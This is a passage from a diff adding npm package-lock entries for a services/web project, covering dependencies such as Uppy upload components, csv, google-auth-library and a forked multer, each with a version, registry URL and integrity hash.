"^4.17.33", + "@types/qs": "*", + "@types/serve-static": "*" + } + }, + "services/web/node_modules/@types/mocha": { + "version": "9.1.1", + "resolved": "https://registry.npmjs.org/@types/mocha/-/mocha-9.1.1.tgz", + "integrity": "sha512-Z61JK7DKDtdKTWwLeElSEBcWGRLY8g95ic5FoQqI9CMx0ns/Ghep3B4DfcEimiKMvtamNVULVNKEsiwV3aQmXw==", + "dev": true + }, + "services/web/node_modules/@uppy/companion-client": { + "version": "3.7.0", + "resolved": "https://registry.npmjs.org/@uppy/companion-client/-/companion-client-3.7.0.tgz", + "integrity": "sha512-37qJNMkqo01SM9h2gkFbV6e+aXM02s2zAda2dGsRLRsjvl/Tx69NlmxJ3xqG/7HWRnYcbBWtspb7y0tt1i/afg==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.7.0", + "namespace-emitter": "^2.0.1", + "p-retry": "^6.1.0" + } + }, + "services/web/node_modules/@uppy/core": { + "version": "3.8.0", + "resolved": "https://registry.npmjs.org/@uppy/core/-/core-3.8.0.tgz", + "integrity": 
"sha512-C93vVhid929+VLGjaD9CZOLJDg8GkEGMUGveFp3Tyo/wujiG+sB3fOF+c6TzKpzPLfNtVpskU1BnI7tZrq1LWw==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.9", + "@uppy/store-default": "^3.2.0", + "@uppy/utils": "^5.7.0", + "lodash": "^4.17.21", + "mime-match": "^1.0.2", + "namespace-emitter": "^2.0.1", + "nanoid": "^4.0.0", + "preact": "^10.5.13" + } + }, + "services/web/node_modules/@uppy/core/node_modules/@transloadit/prettier-bytes": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.9.tgz", + "integrity": "sha512-pCvdmea/F3Tn4hAtHqNXmjcixSaroJJ+L3STXlYJdir1g1m2mRQpWbN8a4SvgQtaw2930Ckhdx8qXdXBFMKbAA==", + "dev": true + }, + "services/web/node_modules/@uppy/dashboard": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/@uppy/dashboard/-/dashboard-3.7.1.tgz", + "integrity": "sha512-qtCMXd2Ymrw0qNGSTlEEMyyDkGUCm+wX5/VrmV9lnfT7JtlSfotUK0K6KvkBeu2v1Chsu27C6Xlq6RddZMR2xQ==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.7", + "@uppy/informer": "^3.0.4", + "@uppy/provider-views": "^3.7.0", + "@uppy/status-bar": "^3.2.5", + "@uppy/thumbnail-generator": "^3.0.6", + "@uppy/utils": "^5.6.0", + "classnames": "^2.2.6", + "is-shallow-equal": "^1.0.1", + "lodash": "^4.17.21", + "memoize-one": "^6.0.0", + "nanoid": "^4.0.0", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.7.1" + } + }, + "services/web/node_modules/@uppy/drag-drop": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@uppy/drag-drop/-/drag-drop-3.0.3.tgz", + "integrity": "sha512-0bCgQKxg+9vkxQipTgrX9yQIuK9a0hZrkipm1+Ynq6jTeig49b7II1bWYnoKdiYhi6nRE4UnDJf4z09yCAU7rA==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.4.3", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.4.0" + } + }, + "services/web/node_modules/@uppy/file-input": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/file-input/-/file-input-3.0.4.tgz", + "integrity": "sha512-D7Nw9GgpABYTcC8SZluDyxd+ppe7+gJejNbPZqMpQyW1S/ME3me55dkDQaVWn8yrgv7347zO2ciue9Rfmko+rQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/informer": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/informer/-/informer-3.0.4.tgz", + "integrity": "sha512-gzocdxn8qAFsW2EryehwjghladaBgv6Isjte53FTBV7o/vjaHPP6huKGbYpljyuQi8i9V+KrmvNGslofssgJ4g==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/progress-bar": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@uppy/progress-bar/-/progress-bar-3.0.4.tgz", + "integrity": "sha512-sxv/mG7Uc9uyTnRvfcXBhO+TWd+UqjuW5aHXCKWwTkMgDShHR0T46sEk12q+jwgbFwyeFg3p0GU3hgUxqxiEUQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/provider-views": { + "version": "3.8.0", + "resolved": "https://registry.npmjs.org/@uppy/provider-views/-/provider-views-3.8.0.tgz", + "integrity": "sha512-sTtx5bgsg2WVR+MyF0gnnM3Z7g3CyFx+Stlz//AvB6g27EMqtqO4zwDR3mestMrETkWYov5bhhqUbt2BaeANpA==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.7.0", + "classnames": "^2.2.6", + "nanoid": "^4.0.0", + "p-queue": "^7.3.4", + "preact": "^10.5.13" + }, + 
"peerDependencies": { + "@uppy/core": "^3.8.0" + } + }, + "services/web/node_modules/@uppy/provider-views/node_modules/eventemitter3": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-5.0.1.tgz", + "integrity": "sha512-GWkBvjiSZK87ELrYOSESUYeVIc9mvLLf/nXalMOS5dYrgZq9o5OVkbZAVM06CVxYsCwH9BDZFPlQTlPA1j4ahA==", + "dev": true, + "license": "MIT" + }, + "services/web/node_modules/@uppy/provider-views/node_modules/p-queue": { + "version": "7.4.1", + "resolved": "https://registry.npmjs.org/p-queue/-/p-queue-7.4.1.tgz", + "integrity": "sha512-vRpMXmIkYF2/1hLBKisKeVYJZ8S2tZ0zEAmIJgdVKP2nq0nh4qCdf8bgw+ZgKrkh71AOCaqzwbJJk1WtdcF3VA==", + "dev": true, + "license": "MIT", + "dependencies": { + "eventemitter3": "^5.0.1", + "p-timeout": "^5.0.2" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/@uppy/provider-views/node_modules/p-timeout": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/p-timeout/-/p-timeout-5.1.0.tgz", + "integrity": "sha512-auFDyzzzGZZZdHz3BtET9VEz0SE/uMEAx7uWfGPucfzEwwe/xH0iVeZibQmANYE/hp9T2+UUZT5m+BKyrDp3Ew==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/@uppy/react": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/@uppy/react/-/react-3.2.1.tgz", + "integrity": "sha512-PoLplDF6YDI7f06T8ORnJhav6CcKNSYWJETXqItZR3jcXIve6pdcCuskqd+l0yiYWf4J2IdyLQXtzgGfIJl7xQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.6.0", + "prop-types": "^15.6.1" + }, + "peerDependencies": { + "@uppy/core": "^3.7.1", + "@uppy/dashboard": "^3.7.1", + "@uppy/drag-drop": "^3.0.3", + "@uppy/file-input": "^3.0.4", + "@uppy/progress-bar": "^3.0.4", + "@uppy/status-bar": "^3.2.5", + "react": "^16.0.0 || ^17.0.0 || ^18.0.0" + }, + "peerDependenciesMeta": { + "@uppy/dashboard": { + "optional": true + }, + "@uppy/drag-drop": { + "optional": true + }, + "@uppy/file-input": { + "optional": true + }, + "@uppy/progress-bar": { + "optional": true + }, + "@uppy/status-bar": { + "optional": true + } + } + }, + "services/web/node_modules/@uppy/status-bar": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/@uppy/status-bar/-/status-bar-3.2.5.tgz", + "integrity": "sha512-bRSxBPio5B+Kuf6w8ll+/i9VUwG8f0FnbZ1yQvCr8J9vxhd0Z5hvwhX4NP8uzHC6ZPJHlEQOTsxzGQ6y+Mdm0A==", + "dev": true, + "dependencies": { + "@transloadit/prettier-bytes": "0.0.9", + "@uppy/utils": "^5.5.2", + "classnames": "^2.2.6", + "preact": "^10.5.13" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/status-bar/node_modules/@transloadit/prettier-bytes": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/@transloadit/prettier-bytes/-/prettier-bytes-0.0.9.tgz", + "integrity": "sha512-pCvdmea/F3Tn4hAtHqNXmjcixSaroJJ+L3STXlYJdir1g1m2mRQpWbN8a4SvgQtaw2930Ckhdx8qXdXBFMKbAA==", + "dev": true + }, + "services/web/node_modules/@uppy/store-default": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/@uppy/store-default/-/store-default-3.2.0.tgz", + "integrity": "sha512-Y7t0peUG89ZKa30vM4qlRIC6uKxIfOANeMT9Nzjwcxvzz8l7es22jG3eAj9WF2F7YSu7xdsH8ODs6SIrJJ8gow==", + "dev": true + }, + "services/web/node_modules/@uppy/thumbnail-generator": { + "version": "3.0.6", + "resolved": "https://registry.npmjs.org/@uppy/thumbnail-generator/-/thumbnail-generator-3.0.6.tgz", + "integrity": 
"sha512-gsi/BQBiunHneXCbo8VglFbhEb0CoQXQjCyGNKoEq/deEcbXhBBDxkiGcgv83l5GZJl2jLiKWqXnXAXREkldrQ==", + "dev": true, + "dependencies": { + "@uppy/utils": "^5.5.2", + "exifr": "^7.0.0" + }, + "peerDependencies": { + "@uppy/core": "^3.6.0" + } + }, + "services/web/node_modules/@uppy/utils": { + "version": "5.7.0", + "resolved": "https://registry.npmjs.org/@uppy/utils/-/utils-5.7.0.tgz", + "integrity": "sha512-AJj7gAx5YfMgyevwOxVdIP2h4Nw/O6h57wKA6gj+Lce6tMORcqzGt4yQiKBsrBI0bPyFWCbzA3vX5t0//1JCBA==", + "dev": true, + "dependencies": { + "lodash": "^4.17.21", + "preact": "^10.5.13" + } + }, + "services/web/node_modules/@uppy/xhr-upload": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/@uppy/xhr-upload/-/xhr-upload-3.6.0.tgz", + "integrity": "sha512-HgWr+CvJzJXAp639AiZatdEWmRdhhN5LrjTZurAkvm9nPQarpi1bo0DChO+1bpkXWOR/1VarBbZOr8lNecEn7Q==", + "dev": true, + "dependencies": { + "@uppy/companion-client": "^3.7.0", + "@uppy/utils": "^5.7.0", + "nanoid": "^4.0.0" + }, + "peerDependencies": { + "@uppy/core": "^3.8.0" + } + }, + "services/web/node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", + "engines": { + "node": ">= 14" + } + }, + "services/web/node_modules/ajv": { + "version": "8.16.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.16.0.tgz", + "integrity": "sha512-F0twR8U1ZU67JIEtekUcLkXkoO5mMMmgGD8sK/xUFzJ805jxHQl92hImFAqqXMyMYjSPOyUPAwHYhB72g5sTXw==", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.4.1" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "services/web/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "services/web/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "services/web/node_modules/aria-query": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz", + "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==", + "dev": true, + "dependencies": { + "dequal": "^2.0.3" + } + }, + "services/web/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "services/web/node_modules/buffer": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": 
"sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "services/web/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "services/web/node_modules/csv": { + "version": "6.2.5", + "resolved": "https://registry.npmjs.org/csv/-/csv-6.2.5.tgz", + "integrity": "sha512-T+K0H7MIrlrnP6KxYKo3lK+uLl6OC2Gmwdd81TG/VdkhKvpatl35sR7tyRSpDLGl22y2T+q9KvNHnVtn4OAscQ==", + "dependencies": { + "csv-generate": "^4.2.1", + "csv-parse": "^5.3.3", + "csv-stringify": "^6.2.3", + "stream-transform": "^3.2.1" + }, + "engines": { + "node": ">= 0.1.90" + } + }, + "services/web/node_modules/csv-generate": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/csv-generate/-/csv-generate-4.2.1.tgz", + "integrity": "sha512-w6GFHjvApv6bcJ2xdi9JGsH6ZvUBfC+vUdfefnEzurXG6hMRwzkBLnhztU2H7v7+zfCk1I/knnQ+tGbgpxWrBw==" + }, + "services/web/node_modules/csv-parse": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-5.3.3.tgz", + "integrity": "sha512-kEWkAPleNEdhFNkHQpFHu9RYPogsFj3dx6bCxL847fsiLgidzWg0z/O0B1kVWMJUc5ky64zGp18LX2T3DQrOfw==" + }, + "services/web/node_modules/csv-stringify": { + "version": "6.2.3", + "resolved": "https://registry.npmjs.org/csv-stringify/-/csv-stringify-6.2.3.tgz", + "integrity": "sha512-4qGjUMwnlaRc00gc2jrIYh2w/h1fo25B0mTuY9K8fBiIgtmCX3LcgUbrEGViL98Ci4Se/F5LFEtu8k+dItJVZQ==" + }, + "services/web/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/web/node_modules/dom-helpers": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", + "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.7", + "csstype": "^3.0.2" + } + }, + "services/web/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "services/web/node_modules/esmock": { + "version": "2.6.7", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.7.tgz", + "integrity": "sha512-4DmjZ0qQIG+NQV1njHvWrua/cZEuJq56A3pSELT2BjNuol1aads7BluofCbLErdO41Ic1XCd2UMepVLpjL64YQ==", + "dev": true, + "engines": { + "node": 
">=14.16.0" + } + }, + "services/web/node_modules/events": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", + "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", + "engines": { + "node": ">=0.8.x" + } + }, + "services/web/node_modules/exifr": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/exifr/-/exifr-7.1.3.tgz", + "integrity": "sha512-g/aje2noHivrRSLbAUtBPWFbxKdKhgj/xr1vATDdUXPOFYJlQ62Ft0oy+72V6XLIpDJfHs6gXLbBLAolqOXYRw==", + "dev": true + }, + "services/web/node_modules/fetch-mock": { + "version": "12.5.2", + "resolved": "https://registry.npmjs.org/fetch-mock/-/fetch-mock-12.5.2.tgz", + "integrity": "sha512-b5KGDFmdmado2MPQjZl6ix3dAG3iwCitb0XQwN72y2s9VnWZ3ObaGNy+bkpm1390foiLDybdJ7yjRGKD36kATw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/glob-to-regexp": "^0.4.4", + "dequal": "^2.0.3", + "glob-to-regexp": "^0.4.1", + "regexparam": "^3.0.0" + }, + "engines": { + "node": ">=18.11.0" + } + }, + "services/web/node_modules/google-auth-library": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-8.7.0.tgz", + "integrity": "sha512-1M0NG5VDIvJZEnstHbRdckLZESoJwguinwN8Dhae0j2ZKIQFIV63zxm6Fo6nM4xkgqUr2bbMtV5Dgo+Hy6oo0Q==", + "dependencies": { + "arrify": "^2.0.0", + "base64-js": "^1.3.0", + "ecdsa-sig-formatter": "^1.0.11", + "fast-text-encoding": "^1.0.0", + "gaxios": "^5.0.0", + "gcp-metadata": "^5.0.0", + "gtoken": "^6.1.0", + "jws": "^4.0.0", + "lru-cache": "^6.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/google-auth-library/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "services/web/node_modules/google-p12-pem": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/google-p12-pem/-/google-p12-pem-4.0.1.tgz", + "integrity": "sha512-WPkN4yGtz05WZ5EhtlxNDWPhC4JIic6G8ePitwUWy4l+XPVYec+a0j0Ts47PDtW59y3RwAhUd9/h9ZZ63px6RQ==", + "dependencies": { + "node-forge": "^1.3.1" + }, + "bin": { + "gp12-pem": "build/src/bin/gp12-pem.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/gtoken": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-6.1.2.tgz", + "integrity": "sha512-4ccGpzz7YAr7lxrT2neugmXQ3hP9ho2gcaityLVkiUecAiwiy60Ii8gRbZeOsXV19fYaRjgBSshs8kXw+NKCPQ==", + "dependencies": { + "gaxios": "^5.0.1", + "google-p12-pem": "^4.0.0", + "jws": "^4.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/web/node_modules/helmet": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-6.0.1.tgz", + "integrity": "sha512-8wo+VdQhTMVBMCITYZaGTbE4lvlthelPYSvoyNvk4RECTmrVjMerp9RfUOQXZWLvCcAn1pKj7ZRxK4lI9Alrcw==", + "engines": { + "node": ">=14.0.0" + } + }, + "services/web/node_modules/https-proxy-agent": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz", + "integrity": "sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==", + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "4" + }, + "engines": { + "node": ">= 14" + } + }, + 
"services/web/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "services/web/node_modules/isarray": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-0.0.1.tgz", + "integrity": "sha512-D2S+3GLxWH+uhrNEcoh/fnmYeP8E8/zHl644d/jdA0g2uyXvy3sb0qxotE+ne0LtccHknQzWwZEzhak7oJ0COQ==", + "dev": true + }, + "services/web/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "services/web/node_modules/lolex": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/lolex/-/lolex-4.2.0.tgz", + "integrity": "sha512-gKO5uExCXvSm6zbF562EvM+rd1kQDnB9AZBbiQVzf1ZmdDpxUSvpnAaVOP83N/31mRK8Ml8/VE8DMvsAZQ+7wg==", + "dev": true + }, + "services/web/node_modules/lru-cache": { + "version": "7.10.1", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-7.10.1.tgz", + "integrity": "sha512-BQuhQxPuRl79J5zSXRP+uNzPOyZw2oFI9JLRQ80XswSvg21KMKNtQza9eF42rfI/3Z40RvzBdXgziEkudzjo8A==", + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/memoize-one": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/memoize-one/-/memoize-one-6.0.0.tgz", + "integrity": "sha512-rkpe71W0N0c0Xz6QD0eJETuWAJGnJ9afsl1srmwPrI+yBCkge5EycXXbYRyvL29zZVUWQCY7InPRCv3GDXuZNw==", + "dev": true + }, + "services/web/node_modules/method-override": { + "version": "2.3.10", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-2.3.10.tgz", + "integrity": "sha1-49r41d7hDdLc59SuiNYrvud0drQ=", + "dependencies": { + "debug": "2.6.9", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/web/node_modules/method-override/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "services/web/node_modules/method-override/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "services/web/node_modules/minimatch": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-7.4.2.tgz", + "integrity": "sha512-xy4q7wou3vUoC9k1xGTXc+awNdGaGVHtFUaey8tiX4H1QRc04DZ/rmDFwNm2EBsuYEhAZ6SgMmYf3InGY6OauA==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "services/web/node_modules/multer": { + "version": "1.4.5-lts.1", + "resolved": "git+ssh://git@github.com/overleaf/multer.git#e1df247fbf8e7590520d20ae3601eaef9f3d2e9e", + "integrity": "sha512-3fJSnWF3iBZJ6Z9y8AjFVY+O4DUKspxSnzXidb3zCKqBYyEKRrpGp7OXjT9th2gWPd+9u64ZyRWUf+YRYn1GCw==", + "license": "MIT", + "dependencies": { + "append-field": "^1.0.0", + 
"busboy": "^1.0.0", + "concat-stream": "^1.5.2", + "mkdirp": "^0.5.4", + "object-assign": "^4.1.1", + "type-is": "^1.6.4", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "services/web/node_modules/nanoid": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-4.0.2.tgz", + "integrity": "sha512-7ZtY5KTCNheRGfEFxnedV5zFiORN1+Y1N6zvPTnHQd8ENUvfaDBeuJDZb2bN/oXwXxu3qkTXDzy57W5vAmDTBw==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.js" + }, + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "services/web/node_modules/nise": { + "version": "1.5.3", + "resolved": "https://registry.npmjs.org/nise/-/nise-1.5.3.tgz", + "integrity": "sha512-Ymbac/94xeIrMf59REBPOv0thr+CJVFMhrlAkW/gjCIE58BGQdCj0x7KRCb3yz+Ga2Rz3E9XXSvUyyxqqhjQAQ==", + "dev": true, + "dependencies": { + "@sinonjs/formatio": "^3.2.1", + "@sinonjs/text-encoding": "^0.7.1", + "just-extend": "^4.0.2", + "lolex": "^5.0.1", + "path-to-regexp": "^1.7.0" + } + }, + "services/web/node_modules/nise/node_modules/lolex": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/lolex/-/lolex-5.1.2.tgz", + "integrity": "sha512-h4hmjAvHTmd+25JSwrtTIuwbKdwg5NzZVRMLn9saij4SZaepCrTCxPr35H/3bjwfMJtN+t3CX8672UIkglz28A==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.0" + } + }, + "services/web/node_modules/nock": { + "version": "13.5.6", + "resolved": "https://registry.npmjs.org/nock/-/nock-13.5.6.tgz", + "integrity": "sha512-o2zOYiCpzRqSzPj0Zt/dQ/DqZeYoaQ7TUonc/xUPjCGl9WeHpNbxgVvOquXYAaJzI0M9BXV3HTzG0p8IUAbBTQ==", + "dev": true, + "dependencies": { + "debug": "^4.1.0", + "json-stringify-safe": "^5.0.1", + "propagate": "^2.0.0" + }, + "engines": { + "node": ">= 10.13" + } + }, + "services/web/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/p-retry": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/p-retry/-/p-retry-6.2.0.tgz", + "integrity": "sha512-JA6nkq6hKyWLLasXQXUrO4z8BUZGUt/LjlJxx8Gb2+2ntodU/SS63YZ8b0LUTbQ8ZB9iwOfhEPhg4ykKnn2KsA==", + "dev": true, + "dependencies": { + "@types/retry": "0.12.2", + "is-network-error": "^1.0.0", + "retry": "^0.13.1" + }, + "engines": { + "node": ">=16.17" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/web/node_modules/path-to-regexp": { + "version": "1.9.0", + "resolved": 